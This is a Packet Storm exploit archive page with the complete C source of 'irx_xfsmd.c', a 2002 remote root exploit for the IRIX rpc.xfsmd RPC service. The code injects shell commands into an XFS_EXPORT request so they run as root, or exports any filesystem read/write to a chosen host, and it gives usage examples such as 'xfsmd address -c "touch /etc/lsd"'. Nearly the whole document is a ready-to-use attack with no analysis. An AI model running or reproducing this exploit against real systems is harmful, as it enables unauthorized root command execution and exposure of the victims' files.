exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

irx_xfsmd.c

irx_xfsmd.c
Posted Jun 25, 2002
Site lsd-pl.net

IRIX xfsmd remote root exploit. Tested against Irix v6.2, 6.3, 6.4, 6.5, and 6.5.16.

tags | exploit, remote, root
systems | irix
SHA-256 | c6084d769bc0885efa3d141525b7b1d3d51a171754bb048f0ab470504dd03df1

irx_xfsmd.c

Change Mirror Download
/*## copyright LAST STAGE OF DELIRIUM Sep 1999 poland        *://lsd-pl.net/ #*/
/*## xfsmd #*/

/* this code forces xfsmd to execute any command on remote IRIX host or */
/* to export any file system from it with read/write privileges. */
/* the exploit requires that DNS is properly configured on an attacked */
/* host. additionally, if the file systems are to be exported from a */
/* vulnerable system, it must have NFS subsystem running. */

/* example usage: */
/* xfsmd address -c "touch /etc/lsd" */
/* (executes "touch /etc/lsd" command as root user on a vulnerable host) */
/* xfsmd address -e 10.0.0.1 -d "/" */
/* (exports / filesystem to the 10.0.0.1 host with rw privileges) */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>

#define XFS_PROG 391016
#define XFS_VERS 1
#define XFS_EXPORT 13

typedef char *req_t;
typedef struct{char *str1;int errno;}res_t;

bool_t xdr_req(XDR *xdrs,req_t *objp){
if(!xdr_string(xdrs,objp,~0)) return(FALSE);
return(TRUE);
}

bool_t xdr_res(XDR *xdrs,res_t *objp){
if(!xdr_string(xdrs,&objp->str1,~0)) return(FALSE);
if(!xdr_int(xdrs,&objp->errno)) return(FALSE);
return(TRUE);
}

main(int argc,char **argv){
char command[10000],*h,*cmd,*hst=NULL,*dir="/etc";
int i,port=0,flag=0,c;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
res_t res;

printf("copyright LAST STAGE OF DELIRIUM Sep 1999 poland //lsd-pl.net/\n");
printf("rpc.xfsmd for irix 6.2 6.3 6.4 6.5 6.5.16 IP:all\n\n");

if(argc<3){
printf("usage: %s address -c \"command\" [-p port]\n",argv[0]);
printf(" %s address -e address [-d dir] [-p port]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"c:p:e:d:"))!=-1){
switch(c){
case 'c': flag=0;cmd=optarg;break;
case 'e': flag=1;hst=optarg;break;
case 'd': dir=optarg;break;
case 'p': port=atoi(optarg);
}
}

req=command;
if(!flag){
printf("executing %s command... ",cmd);
sprintf(req,"XFS_MNT_DIR:/tmp\nroot:;%s;",cmd);
}else{
printf("exporting %s directory to %s... ",dir,hst);
sprintf(req,"XFS_FS_NAME:%s\nroot:%s\n",dir,hst);
}

adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}else{
if((hp=gethostbyaddr((char*)&adr.sin_addr.s_addr,4,AF_INET))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
}
if((h=(char*)strchr(hp->h_name,'.'))!=NULL) *(h+1)=0;
else strcat(hp->h_name,".");

i=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,XFS_PROG,XFS_VERS,&i,0,0))){
clnt_pcreateerror("error");exit(-1);
}

cl->cl_auth=authunix_create(hp->h_name,0,0,0,NULL);
stat=clnt_call(cl,XFS_EXPORT,xdr_req,(void*)&req,xdr_res,(void*)&res,tm);
if(stat!=RPC_SUCCESS) {clnt_perror(cl,"error");exit(-1);}
printf("%s\n",(!flag)?"ok":((!res.errno)?"ok":"failed"));
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close